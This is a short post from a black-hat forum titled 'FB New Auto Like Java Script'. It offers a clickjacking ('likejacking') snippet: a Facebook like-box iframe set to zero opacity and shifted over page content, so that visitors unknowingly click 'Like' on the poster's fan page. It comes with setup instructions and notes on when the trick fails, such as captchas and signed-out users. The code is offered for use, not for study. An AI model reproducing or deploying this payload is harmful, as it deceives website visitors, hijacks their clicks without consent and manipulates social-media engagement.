Best Black Hat Forum

Full Version: FB New Auto Like Java Script
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
 
Code:
<iframe 
src="http://www.facebook.com/plugins/likebox.php?id=FANID&amp;width=292&amp;connections=10&amp;stream=true&amp;header=true&amp;height=587"
scrolling="no" frameborder="0" style="border:none; overflow:hidden; 
width:1000px; height:80px; position: relative; top: -70px; left: -70px; 
filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity:
0.0;" allowTransparency="true" id="fbframe" 
name="fbframe"></iframe>

Replace FANID with your fan page's ID
Tested this mod on Chrome/Firefox. I have no idea if it works in IE.)

A few things to watch out for: 
Fan page boxes pop up with a "VERIFICATION REQUIRED" captcha on non-PVA and
"untrusted" accounts. Because of the nature of the script, this 
disables the Like from going through. Also, if a user is signed out, 
similar behavior will occur in which the user will be asked to login to 
Facebook first.